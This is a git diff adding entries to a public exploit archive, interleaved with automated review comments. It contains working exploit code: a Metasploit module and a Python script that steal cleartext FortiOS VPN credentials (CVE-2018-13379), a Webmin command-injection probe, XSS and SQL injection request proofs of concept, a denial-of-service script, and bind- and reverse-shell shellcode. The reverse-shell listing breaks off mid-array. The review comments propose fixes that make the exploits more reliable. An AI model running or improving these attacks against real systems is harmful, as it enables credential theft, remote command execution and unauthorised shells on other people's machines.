diff --git a/exploits/hardware/webapps/47287.rb b/exploits/hardware/webapps/47287.rb
new file mode 100755
index 000000000..48eca7846
--- /dev/null
+++ b/exploits/hardware/webapps/47287.rb
@@ -0,0 +1,78 @@ +# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Google Dork: intext:"Please Login" inurl:"/remote/login" +# Date: 17/08/2019 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.fortinet.com/ +# Software Link: https://www.fortinet.com/products/fortigate/fortios.html +# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). +# Tested on: 5.6.6 +# CVE : CVE-2018-13379 + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Post::File + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SSL VPN FortiOs - System file leak', + 'Description' => %q{ + FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. + This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). + This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). 
+ }, + 'References' => + [ + [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] + ], + 'Author' => [ 'lynx (Carlos Vieira)' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'RPORT' => 443, + 'SSL' => true + }, + )) + + end + + + def run() + print_good("Checking target...") + res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) + + if res && res.code == 200 + print_good("Target is Vulnerable!") + data = res.body + current_host = datastore['RHOST'] + filename = "msf_sslwebsession_"+current_host+".bin" + File.delete(filename) if File.exist?(filename) + file_local_write(filename, data) + print_good("Parsing binary file.......") + parse() + else + if(res && res.code == 404) + print_error("Target not Vulnerable") + else + print_error("Ow crap, try again...") + end + end + end + def parse() + current_host = datastore['RHOST'] + + fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") + words = 0 + while (line = fileObj.gets) + printable_data = line.gsub(/[^[:print:]]/, '.') + array_data = printable_data.scan(/.{1,60}/m) + for ar in array_data + if ar != "............................................................" + print_good(ar) + end + end + #print_good(printable_data) + + end + fileObj.close + end +end \ No newline at end of file diff --git a/exploits/hardware/webapps/47288.py b/exploits/hardware/webapps/47288.py new file mode 100755 index 000000000..8e0cde795 --- /dev/null +++ b/exploits/hardware/webapps/47288.py 
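Review bot: The vulnerability decision at `if res && res.code == 200` trusts the status code alone, so any 200 reply (an error page, a different resource) is reported as "Target is Vulnerable!" and written to disk; the Python sibling checks the body for the `var fgt_lang =` marker and this module should too: `if res && res.code == 200 && res.body.include?('var fgt_lang =')`. The cleartext session data is written to `"msf_sslwebsession_"+current_host+".bin"` in whatever directory the framework runs from, via `file_local_write` from `Msf::Post::File` (a post-exploitation mixin that is otherwise unused in this auxiliary module); `store_loot('fortios.sslvpn_websession', 'application/octet-stream', datastore['RHOST'], res.body)` is the Metasploit convention and keeps the credentials under the loot directory. `parse()` then re-opens that file and reads it line by line although the response is binary and still in `data`; handing `data` to the parser avoids the second read and the `File.delete`/rewrite dance.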
@@ -0,0 +1,96 @@ +# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Google Dork: intext:"Please Login" inurl:"/remote/login" +# Date: 17/08/2019 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.fortinet.com/ +# Software Link: https://www.fortinet.com/products/fortigate/fortios.html +# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). +# Tested on: 5.6.6 +# CVE : CVE-2018-13379 + +# Exploit SSLVPN Fortinet - FortiOs +#!/usr/bin/env python +import requests, sys, time +import urllib3 +urllib3.disable_warnings() + + +def leak(host, port): + print("[!] Leak information...") + try: + url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + r=requests.get(url, headers=headers, verify=False, stream=True) + img=r.raw.read() + if "var fgt_lang =" in str(img): + with open("sslvpn_websession_"+host+".dat", 'w') as f: + f.write(img) + print("[>] Save to file ....") + parse(host) + print("\n") + return True + else: + return False + except requests.exceptions.ConnectionError: + return False +def is_character_printable(s): + return all((ord(c) < 127) and (ord(c) >= 32) for c in s) + +def is_printable(byte): + if is_character_printable(byte): + return byte + else: + return '.' + +def read_bytes(host, chunksize=8192): + print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat") + with open("sslvpn_websession_"+host+".dat", "rb") as f: + while True: + chunk = f.read(chunksize) + if chunk: + for b in chunk: + yield b + else: + break +def parse(host): + print("[!] 
Parsing Information...") + memory_address = 0 + ascii_string = "" + for byte in read_bytes(host): + ascii_string = ascii_string + is_printable(byte) + if memory_address%61 == 60: + if ascii_string!=".............................................................": + print ascii_string + ascii_string = "" + memory_address = memory_address + 1 + +def check(host, port): + print("[!] Check vuln...") + uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + try: + r = requests.get("https://" + host + ":" + port + uri, verify=False) + if(r.status_code == 200): + return True + elif(r.status_code == 404): + return False + else: + return False + except: + return False +def main(host, port): + print("[+] Start exploiting....") + vuln = check(host, port) + if(vuln): + print("[+] Target is vulnerable!") + bin_file = leak(host, port) + else: + print("[X] Target not vulnerable.") + +if __name__ == "__main__": + + if(len(sys.argv) < 3): + print("Use: python {} ip/dns port".format(sys.argv[0])) + else: + host = sys.argv[1] + port = sys.argv[2] + main(host, port) \ No newline at end of file diff --git a/exploits/linux/webapps/47293.sh b/exploits/linux/webapps/47293.sh new file mode 100755 index 000000000..37277996b --- /dev/null +++ b/exploits/linux/webapps/47293.sh 
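Review bot: `check()` is not a side-effect-free probe — it requests the same `/dev/cmdb/sslvpn_websession` path as `leak()`, so every run pulls the session file (and the credentials inside it) off the target twice; calling `leak()` directly and treating its marker test as the check avoids the duplicate exfiltration. `read_bytes()` prints `"sslvpn_websession"+host+".dat"` but `leak()` writes `"sslvpn_websession_"+host+".dat"`, so the log names a file that does not exist. The `print ascii_string` statement and `for b in chunk` yielding one-character strings make this Python 2 only, yet `#!/usr/bin/env python` is not on line 1 and so never takes effect; `#!/usr/bin/env python2` as the first line would make the requirement explicit. Neither `requests.get` call has a `timeout=`, so a filtering host hangs the script, and with `Accept-Encoding: gzip, deflate` advertised, `r.raw.read()` returns the undecoded body — `r.raw.read(decode_content=True)` (or `r.content`) is what the `"var fgt_lang ="` test needs if the device ever compresses the reply.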
@@ -0,0 +1,31 @@
+#!/bin/sh
+#
+# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
+# based on Metasploit module https://www.exploit-db.com/exploits/47230
+# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
+# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
+#
+# Fernando A. Lagos B. (Zerial)
+# https://blog.zerial.org
+# https://blog.nivel4.com
+#
+# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
+#
+# Usage: sh CVE-2019-15107.sh https://target:port
+# Example: sh CVE-2019-15107.sh https://localhost:10000
+# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
+#
+
+FLAG="f3a0c13c3765137bcde68572707ae5c0"
+URI=$1;
+
+echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
+curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
+
+if [ $? -eq 0 ];
+then
+ echo '\033[0;31mVULNERABLE!\033[0m'
+else
+ echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
+fi
+#EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/47286.txt b/exploits/php/webapps/47286.txt
new file mode 100644
index 000000000..fe5d918d6
--- /dev/null
+++ b/exploits/php/webapps/47286.txt
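Review bot: `URI=$1` is never validated and is expanded unquoted in the `curl` line, so running the script with no argument sends the request to the relative URL `/password_change.cgi` and a URI with shell metacharacters is word-split; `URI="${1:?usage: $0 https://target:port}"` plus quoting `"$URI/password_change.cgi"` and `"Referer: $URI/session_login.cgi"` fixes both. The probe body `old=id|echo $FLAG` runs `id` on the target in addition to the marker `echo`; if the injection point accepts it, a bare `echo $FLAG` is the less intrusive check. `echo -n` and the `\033` colour escapes depend on which `sh` is installed (bash's builtin prints them literally); `printf` is the portable form. A missing marker only shows that this particular request (the `expired=2` path) did not echo, and with `-ks` and no `--max-time` a non-responding host hangs the script, so `--max-time 15` is worth adding to the `curl` call.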
@@ -0,0 +1,32 @@ +# Exploit Title: Kimai 2- persistent cross-site scripting (XSS) +# Date: 07/15/2019 +# Exploit Author: osamaalaa +# Vendor Homepage: [link] +# Software Link: https://github.com/kevinpapst/kimai2 +# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962 +# Version: 2 + +1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create + +2-Add this payload "> in the description + +3-Save The changes + +4-refresh and we have alert pop up! + +The Request POC : + +POST /index.php/en/timesheet/create HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 392 +Connection: close +Referer: http://localhost +Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv + +timesheet_edit_form[begin]=2019-08-17 13:02×heet_edit_form[end]=2019-08-18 00:00×heet_edit_form[customer]=12×heet_edit_form[project]=24×heet_edit_form[activity]=27×heet_edit_form[description]= ">×heet_edit_form[tags]=×heet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0 \ No newline at end of file diff --git a/exploits/php/webapps/47289.txt b/exploits/php/webapps/47289.txt new file mode 100644 index 000000000..da318036f --- /dev/null +++ b/exploits/php/webapps/47289.txt 
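Review bot: The payload in step 2 and in the `timesheet_edit_form[description]` field of the PoC request is reduced to `">` — as rendered here the injected tag itself is absent, so the PoC cannot be reproduced from this file; the payload should be stated verbatim, or HTML-encoded if it was stripped on submission (the `Content-Length: 392` also no longer matches the shown body). `Vendor Homepage: [link]` is an unfilled placeholder. The `_token` value and `PHPSESSID` in the request are session-specific and could be marked as such so readers do not take them for constants.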
@@ -0,0 +1,57 @@ +# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability +# Date: 18.8.2019. +# Exploit Author: n1x_ [MS-WEB] +# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547 +# Version: 3.5 +# CWE : CWE-79 + +[Description] + +# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations. +# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. + +[Proof of Concept] + +# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login] +# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket] +# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] + +[Example paylods] + +# Example payload: "> +# Example payload: "> + +[POST Request] + +POST /neo/crm/tickets/addticket HTTP/1.1 +Host: host +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: //host/neo/crm/tickets/addticket +Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523 +Content-Length: 694 +Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="title" + +"> +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="content" + +

">

+-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="files"; filename="" +Content-Type: application/octet-stream + + +-----------------------------899768029113033755249127523 +Content-Disposition: form-data; name="userfile"; filename="" +Content-Type: application/octet-stream + + +-----------------------------899768029113033755249127523-- \ No newline at end of file diff --git a/exploits/php/webapps/47294.txt b/exploits/php/webapps/47294.txt new file mode 100644 index 000000000..903f7b3b1 --- /dev/null +++ b/exploits/php/webapps/47294.txt @@ -0,0 +1,36 @@ +# Exploit Title: YouPHPTube < 7.3 SQL Injection +# Google Dork: / +# Date: 19.08.2019 +# Exploit Author: Fabian Mosch, r-tec IT Security GmbH +# Vendor Homepage: https://www.youphptube.com/ +# Software Link: https://github.com/YouPHPTube/YouPHPTube +# Version: < 7.3 +# Tested on: Linux/Windows +# CVE : CVE-2019-14430 + +The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example. + +Example Request: + +POST /objects/userCreate.json.php HTTP/1.1 +Host: vulnerablehost.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +[SomeHeaders and Cookies] + +user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx + +Methods for DB-Extraction are: + + +- Boolean-based blind + +- Error-based + +- AND/OR time-based blind + + +The vulnerability was fixed with this commit: +https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a \ No newline at end of file 
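Review bot: Both example payloads and the `title`/`content` parts of the multipart body are reduced to `">` with the injected element missing, so the stored-XSS PoC cannot be reproduced from this file as written; if the markup was stripped on submission it should be re-added HTML-encoded. The request also carries real-looking `__cfduid` and `ci_sessions` cookie values, which are session-specific and better replaced by placeholders.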
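Review bot: The example body `pass=test'INJECTHERE &email=...` has a literal space before `&email`, which is not valid `application/x-www-form-urlencoded` data and will be sent as part of the `pass` value by most tooling; it should be `+`/`%20` or removed. The description names the parameters "User" and "pass" while the request uses lowercase `user`; PHP `$_POST` keys are case-sensitive, so the lowercase spelling is the one to cite. Since the injection point is the registration handler, it is worth noting that each probe may create an account on the target.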
diff --git a/exploits/windows/dos/47285.py b/exploits/windows/dos/47285.py
new file mode 100755
index 000000000..780348c04
--- /dev/null
+++ b/exploits/windows/dos/47285.py
@@ -0,0 +1,29 @@
+# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
+# Date: 16.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/RARPRSetup.exe
+# Exploit Author: Achilles
+# Tested Version: v1.80
+# Tested on: Windows 7 x64
+# Windows XP SP3
+
+
+# 1.- Run python code :RAR Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open RAR Password Recovery and Click 'Register'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 179187f8e..7fa453b14 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
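Review bot: The bare `except:` at the end of the script turns a permission or path error into the generic "File cannot be created" with no reason, and swallows a Ctrl-C inside the `try` the same way; `except IOError as e: print "File cannot be created: %s" % e` (this is Python 2 — `print` is a statement) keeps both the message and the cause. The handle is closed by hand, so it leaks on the error path; `with open("Evil.txt", "w") as f:` closes it either way. The instructions refer to `EVIL.txt` while the code writes `Evil.txt`, which are different files on a case-sensitive filesystem, and `#!/usr/bin/env python` is not line 1, so the shebang is ineffective.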
@@ -6550,6 +6550,7 @@ id,file,description,date,author,type,platform,port
 47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
 47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
 47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64,
+47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41646,3 +41647,9 @@ id,file,description,date,author,type,platform,port
 47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php,
 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
+47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80
+47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
+47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
+47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index ddac87adc..831e71cfb 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -996,3 +996,6 @@ id,file,description,date,author,type,platform
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
 47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
 47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/47290.c b/shellcodes/linux_x86-64/47290.c
new file mode 100644
index 000000000..176bcdeff
--- /dev/null
+++ b/shellcodes/linux_x86-64/47290.c
@@ -0,0 +1,189 @@ +/* +; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes) +; Date : 2019-08-18 +; Author : Gonçalo Ribeiro (@goncalor) +; Website : goncalor.com +; SLAE64-ID : 1635 + +global _start + +%define pass "pass" +%define port 0x5c11 ; htons(4444) + +_start: + jmp real_start + password: db pass + pass_len: db $-password + +real_start: +socket: + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; __NR_socket = 41 + ; On success, a file descriptor for the new socket is returned + + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx) + syscall + + push rax + pop rdi + +bind: + ; server.sin_family = AF_INET; short + ; server.sin_port = htons(4444); unsigned short + ; server.sin_addr.s_addr = INADDR_ANY; unsigned long + ; bzero(&server.sin_zero, 8); + ; + ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html + ; struct sockaddr_in { + ; short sin_family; + ; unsigned short sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + ; + ; bind(sock, (struct sockaddr *)&server, sockaddr_len) + ; INADDR_ANY = 0 + ; AF_INET = 2 + ; __NR_bind = 49 + ; On success, zero is returned + + xor eax, eax ; shorter and will still zero the upper bytes + push rax ; sin_zero + push ax + push ax ; sin_addr + push word port + push word 2 + + ; bind + add al, 49 + push rsp + pop rsi + add dl, 16 ; sizeof(sockaddr_in) + syscall + +listen: + ; listen(sock, 2) + ; __NR_listen = 50 + ; On success, zero is returned + + mov al, 50 + xor esi, esi + mov sil, 2 + syscall + +accept: + ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) + ; __NR_accept = 43 + ; On success, a file descriptor is returned + + mov al, 43 + xor esi, esi + ;xor rdx, rdx ; already zeroed + syscall + + push rax + +;close: + ; close(sock) + ; __NR_close = 3 + ; returns zero on success + + ; closing is not strictly necessary + ;mov al, 3 + ;syscall + +dup2: + ; 
dup2(new, 0); + ; dup2(new, 1); + ; dup2(new, 2); + ; __NR_dup2 = 33 + ; On success, return the new file descriptor + + pop rdi ; "new" was pushed in accept() + push 2 + pop rsi + +dup2_loop: + mov al, 33 + syscall + dec esi + jns dup2_loop + +read_password: + ; read(int fd, void *buf, size_t count) + ; On success, the number of bytes read is returned + + ;xor eax, eax ; already done by dup2 + ;rdi = "new" ; already done in dup2 + push rax + push rax ; create space for "buf" in the stack + push rsp + pop rsi ; rsi = *buf + mov dl, 16 + syscall + +compare_password: + xor ecx, ecx + lea rdi, [rel pass_len] + mov cl, [rdi] + sub rdi, rcx + cld + repz cmpsb + jne exit + +execve: + ; execve(const char *path, char *const argv[], char *const envp[]) + ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding) + ; rsi, argv = (char**) (/bin//sh, 0x00) + ; rdx, envp = &0x00 + + xor eax, eax + push rax + push rsp + pop rdx ; *rdx = &0x00 + + mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev) + push rsi + push rsp + pop rdi ; rdi = (char*) /bin//sh + + push rax + push rdi + push rsp + pop rsi ; rsi = (char**) (/bin//sh, 0x00) + + mov al, 59 + syscall + +exit: + ;xor eax, eax ; upper bytes are zero after read + mov al, 60 + syscall +*/ + + +#include +#include + +char code[] = +"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f" +"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04" +"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0" +"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8" +"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a" +"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62" +"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0" +"\x3c\x0f\x05"; + +int main() { + printf("length: %lu\n", strlen(code)); + ((int(*)()) code)(); +} \ No newline at end of file 
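Review bot: The password check in `compare_password` sets `rcx = pass_len` and runs `repz cmpsb` over the 16-byte `read` buffer, so only the first `pass_len` bytes are compared — any input that merely starts with the password is accepted — and a password longer than the single 16-byte `read` can never match. The "configurable" password is only configurable at the assembly level: `pass_len` and the `lea rdi, [rel pass_len]` displacement (`\x48\x8d\x3d\xad\xff\xff\xff`) are baked into the `code[]` bytes, so changing it means reassembling, which the header could say. `exit` relies on the comment `upper bytes are zero after read`, which holds only when `read` succeeded; if `accept` or `read` fails, `rax` holds a negative errno and `mov al, 60` does not yield `SYS_exit` — an explicit `xor eax, eax` before `mov al, 60` (two bytes) makes the exit path unconditional. The harness executes a global `char code[]` from `.data`, so it presumably needs `-z execstack` (or equivalent) on a default toolchain; a build line in the comment would help.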
diff --git a/shellcodes/linux_x86-64/47291.c b/shellcodes/linux_x86-64/47291.c
new file mode 100644
index 000000000..bbc44c671
--- /dev/null
+++ b/shellcodes/linux_x86-64/47291.c
@@ -0,0 +1,155 @@ +/* +; Title : Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes) +; Date : 2019-08-18 +; Author : Gonçalo Ribeiro (@goncalor) +; Website : goncalor.com +; SLAE64-ID : 1635 + +global _start + +%define pass "pass" +%define port 0x5c11 ; htons(4444) + +_start: + jmp real_start + password: db pass + pass_len: db $-password + +real_start: +socket: + ; sock = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; __NR_socket = 41 + ; On success, a file descriptor for the new socket is returned + + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx) + syscall + + push rax + pop rdi + +connect: + ; server.sin_family = AF_INET; short + ; server.sin_port = htons(4444); unsigned short + ; server.sin_addr.s_addr = inet_addr("127.0.0.1"); unsigned long + ; bzero(&server.sin_zero, 8); + ; + ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html + ; struct sockaddr_in { + ; short sin_family; + ; unsigned short sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + ; + ; connect(sock, (struct sockaddr *)&server, sockaddr_len) + ; AF_INET = 2 + ; __NR_connect = 42 + ; On success, zero is returned + + xor eax, eax + push rax ; sin_zero + push 0x10ffff70 ; sin_addr (xored) + xor dword [rsp], 0x11ffff0f ; recover sin_addr + push word port + push word 2 + + ; connect + add al, 42 + push rsp + pop rsi + add dl, 16 ; sizeof(sockaddr_in) + syscall + +dup2: + ; dup2(sock, 0); + ; dup2(sock, 1); + ; dup2(sock, 2); + ; __NR_dup2 = 33 + ; On success, return the new file descriptor + + push 2 + pop rsi + +dup2_loop: + mov al, 33 + syscall + dec esi + jns dup2_loop + +read_password: + ; read(int fd, void *buf, size_t count) + ; On success, the number of bytes read is returned + + ;xor eax, eax ; already done by dup2 + ;rdi = "sock" ; already done + push rax + push rax ; create space for "buf" in the stack + push rsp + pop rsi ; rsi = *buf + mov 
dl, 16 + syscall + +compare_password: + xor ecx, ecx + lea rdi, [rel pass_len] + mov cl, [rdi] + sub rdi, rcx + cld + repz cmpsb + jne exit + +execve: + ; execve(const char *path, char *const argv[], char *const envp[]) + ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding) + ; rsi, argv = (char**) (/bin//sh, 0x00) + ; rdx, envp = &0x00 + + xor eax, eax + push rax + push rsp + pop rdx ; *rdx = &0x00 + + mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev) + push rsi + push rsp + pop rdi ; rdi = (char*) /bin//sh + + push rax + push rdi + push rsp + pop rsi ; rsi = (char**) (/bin//sh, 0x00) + + mov al, 59 + syscall + +exit: + ;xor eax, eax ; upper bytes are zero after read + mov al, 60 + syscall +*/ + + +#include +#include + +char code[] = +"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f" +"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11" +"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02" +"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31" +"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a" 